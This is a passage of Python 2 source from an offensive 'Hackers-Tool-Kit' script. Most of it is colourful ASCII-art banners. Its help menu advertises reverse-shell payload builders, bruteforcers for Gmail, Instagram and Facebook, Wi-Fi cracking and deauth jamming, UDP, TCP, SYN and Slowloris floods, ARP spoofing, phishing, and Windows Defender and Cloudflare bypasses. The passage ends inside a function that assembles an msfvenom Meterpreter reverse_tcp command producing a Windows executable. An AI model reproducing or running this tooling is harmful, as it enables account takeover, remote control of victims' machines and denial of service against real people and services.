░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') -def mainbanner18(): - print """ - Type \033[31m?\033[0m For\033[31m Help\033[0m -\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ -║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ -║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m -║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ -║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ -╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ - """.decode('utf-8') - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,18) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() - if num == 18: - mainbanner18() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe 